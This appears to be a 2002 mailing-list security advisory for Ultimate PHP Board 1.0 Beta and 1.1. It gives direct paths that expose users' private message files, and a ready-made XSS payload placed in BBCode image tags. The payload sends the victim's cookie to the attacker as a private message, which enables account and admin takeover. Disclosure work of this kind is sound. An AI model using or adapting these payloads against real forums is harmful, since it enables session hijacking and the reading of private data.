('binary' encoding is not supported, stored as-is) Product : Ultimate PHP Board http://xcrew.host.sk Versions : 1.0 Beta 1.1 Problems : 1.0 B : - Reading of privates messages 1.1 & 1.0 B : - Access to users/admins accounts Exploits : 1.0 B : - /members/ID.pm - /members/ID.xbb 1.1 : - [img]javascript:window.open(' index.php? upb=pm&mode=send&send=yes&target_id=MY- ID&betreff=cookie&pm='+document.cookie+ '&smilies=1&use_upbcode=1&pmbox_id=VICTIME- ID&check=yes ')[/img] More details in french : http://www.ifrance.com/kitetoua/tuto/UPB.txt translated by google : http://translate.google.com/translate?u=http%3A% 2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2FUPB.txt&langpair=fr%7Cen&hl=en&prev=% 2Flanguage_tools frog-m@n
This archive was generated by hypermail 2b30 : Mon Apr 22 2002 - 22:04:17 PDT